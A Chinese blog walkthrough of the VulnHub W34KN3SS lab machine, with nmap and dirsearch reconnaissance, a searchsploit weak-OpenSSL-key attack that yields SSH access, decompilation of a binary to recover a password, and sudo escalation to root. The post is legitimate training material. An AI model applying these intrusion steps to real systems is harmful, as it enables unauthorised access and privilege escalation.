W34KN3SS靶机渗透测试

于 2024-08-11 20:48:17 发布
阅读量339 收藏 7
点赞数 3
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/141111542
版权

一、靶机下载地址

https://www.vulnhub.com/entry/w34kn3ss-1,270/

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:ED:51:4D"

2、端口扫描

# 使用命令
nmap 192.168.145.208 -p- -sV

3、指纹识别

# 使用命令
whatweb 192.168.145.208

4、目录扫描

# 使用命令
dirsearch -u  "http://192.168.145.208"

三、获取shell

1、访问靶机IP地址

2、拼接并访问/test,提示需要 key

3、看看443端口得到的域名 weakness.jth,但是访问不到,绑定一下hosts

192.168.145.208 weakness.jth
#Windows
C:\Windows\System32\drivers\etc\hosts
#Linux
/etc/hosts

4、兔子尾巴有一个值n30,可能作为账号或密码

5、对http://weakness.jth/进行目录扫描

6、拼接访问 private ,有两个文件,看一下内容

7、mykey.pub文件内容

8、notes.txt文件内容,提示这个 key 由 openssl 0.9.8c-1 生成

9、kali 使用 searchsploit工具查一下

# 使用命令
searchsploit 0.9.8c-1

10、将5622.txt文件保存到当前目录下

# 使用命令
searchsploit -m 5622

11、查看 5622.txt文件内容,给出了 url,需要下载

# URL
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2

12、下载后,进行解压

# 使用命令
tar vxjf 5622.tar.bz2

13、匹配 mykey.pub 内容,得到公钥

# 使用命令
grep -r -l "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster"

# 公钥
4161de56829de2fe64b9055711f531c1-2537.pub

14、进入对应目录,公钥连接ssh,连接成功

# 使用命令
cd rsa/2048

ssh -i 4161de56829de2fe64b9055711f531c1-2537 n30@192.168.145.208

四、提权

1、查看当前目录,发现 user.txt 和可执行文件 code

2、查看 user.txt文件内容

3、查看 code 文件类型,是一个 python 文件

# 使用命令
file code

4、把文件 copy 复制到网站根目录,开启一个临时 web 服务,下载下来

# 使用命令
cp code /var/www/html
cd /var/www/html
python3 -m http.server
wget http://192.168.145.208:8000/code

5、使用 uncompyle6工具,下载命令

# 使用命令
pip install uncompyle6

6、修改 code 名为 code.pyc,使用 uncompyle6 反编译,得到密码n30:dMASDNB!!#B!#!#33

# 使用命令
mv code code.pyc
uncompyle6 code.pyc

7、输入sudo -l命令查看当前权限

8、显示 all ,那么直接 sudo su 提权,提权成功

果冻*果冻*
关注
渗透测试靶机:DC-2
m0_70830611的博客
12-18 100
jerry和tom的密码成功爆了出来,对wp-admin进行下登陆。还有个7744端口的ssh可以利用,尝试下这两个用户能否登陆进去。git是以root权限执行的,git也照应了上一个flag的提示。尝试绕过rbash(这里直接借鉴了别人的,但还是不太懂)发现ls能列出home目录,然后还能直接用less查看。得到了三个用户admin、jerry、tom。很明显有个wp-admin的登陆网页。用jerry登陆进去后直接就找到了。jerry没有成功,但tom可以。后面的步骤做的有些云里雾里的。
靶机系列--W34KN3SS
Nginxx的博客
12-02 1355
靶机系列
渗透测试靶机
anquanzushiye的博客
03-20 1199
网站今日更新PPT内容:1.从刑事个案看信息保护与数据利用 https://www.secshi.com/34183.html2.网络空间治理的中国法治...
靶机渗透测试(HA: NARAK)
@小张小张的博客
10-24 2918
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy–Intermediate) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.0
靶机渗透测试(Pandavas)
@小张小张的博客
11-01 1140
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy) 目标:Get root! 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 得到靶机ip为:192.168.10.33 2. nmap进行靶机端口服务扫描 命令:nmap -sS -Pn -A -p-
对DriftingBlues-6靶机进行渗透测试
zll___的博客
04-20 606
对DriftingBlues-6靶机进行渗透测试
靶机W34KN3SS练习报告1
08-08
"靶机W34KN3SS练习报告1"提供了一个详细的过程,展示了如何逐步攻破一个虚拟靶机,并最终获取root权限。以下是这个过程中的关键知识点: 1. **虚拟机导入与启动**:靶机是以.ova格式提供的,可以使用VirtualBox或...
mA8LyJnrKbytbUDZhUE32I6w34q.txt
最新发布
08-25
mA8LyJnrKbytbUDZhUE32I6w34q.txt
SICK W34紧凑型光电开关 选型册.rar
10-13
《SICK W34紧凑型光电开关:选型与应用详解》 SICK W34系列紧凑型光电开关,作为工业自动化领域中的重要组件,以其卓越的性能和灵活的适用性,广泛应用于各种生产线和设备中。这款开关以其小巧的体积、高效的检测...
W34紧凑型光电传感器选型手册(中文版).zip
09-13
《W34紧凑型光电传感器选型手册》是为工程师们提供的一款详尽的参考资料,旨在帮助用户在设计和实施工业自动化项目时选择合适的光电传感器。这款传感器因其紧凑的尺寸和高效性能而在众多领域得到广泛应用,包括物流...
靶机渗透测试(cherry:1)
@小张小张的博客
10-26 1121
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate–Hard) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.
渗透测试靶机---Kioptrix_Level_1
久恙502的博客
07-19 561
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
渗透测试靶机---Tr0ll
久恙502的博客
10-28 371
渗透测试,打靶经历记录,大佬多多指点,谢谢!
靶机渗透测试(Sumo_Sun*)
@小张小张的博客
09-19 579
靶机渗透测试(Sumo_Sun*): Vulnhub靶机 Sumo_Sun* 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Beginner) 目标:成功渗透进入靶机,得到root shell ,提升至root权限! 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 得到靶机ip地址:192.168.10.22 2. nmap进行靶机端口服务扫描 nmap -sS -Pn -A -p- -n 靶
靶机简单渗透测试
KKK_2178的博客
11-22 5535
1.下载靶机Metasploitable2-Linux,下载地址:Metasploitable download | SourceForge.net 2.在虚拟机中打开Kali-Linux和下载好的Metasploitable2-Linux,Metasploitable2-Linux的账号:msfadmin,密码:msfadmin. 3.在靶机中输入指令ifconfig,得到靶机ip 4.返回Kali虚拟机操作 输入指令nmap xxxxx (xxxxx为你靶机的ip)查看靶机端口.
渗透测试:DC-2靶机
Ciyaso的博客
08-16 242
一、扫描获取靶机ip 用nmap扫描192.168.203.0/24以获取靶机ip arp-scan -l 192.168.203.139 二、获取网站信息 1.nmap nmap -A -v -sS -sV -p- 192.168.203.139 开放了80端口、7744端口 2.Wappaloyzer web服务器:Apache 2.4.10 CMS:WordPress 数据库: Mysql JS库:jQuery 进入页面发现访问不了 查看发现直接访问80端口会跳转到http://dc
靶机渗透测试(covfefe)
@小张小张的博客
11-14 1674
靶机渗透测试(covfefe): Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate) 目标:Covfefe is my Debian 9 based B2R VM, originally created as a CTF for SecTalks_BNE. It has three flags… flag进度:3/3 渗透流程: 1. 探测靶机ip地址(netdiscover -i e
R语言代码编写 提取大写字母后的数字 df<-tibble(x=c("12W34", "AB2C46", "B217C","akTs6df","21WD4"))
06-07
df (x = c("12W34", "AB2C46", "B217C", "akTs6df", "21WD4")) df$number ("^.*[A-Z](\\d+).*", "\\1", df$x) ``` 解释一下代码: 1. 首先,我们使用了 `gsub` 函数,它可以帮助我们在一个字符串中查找和替换...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值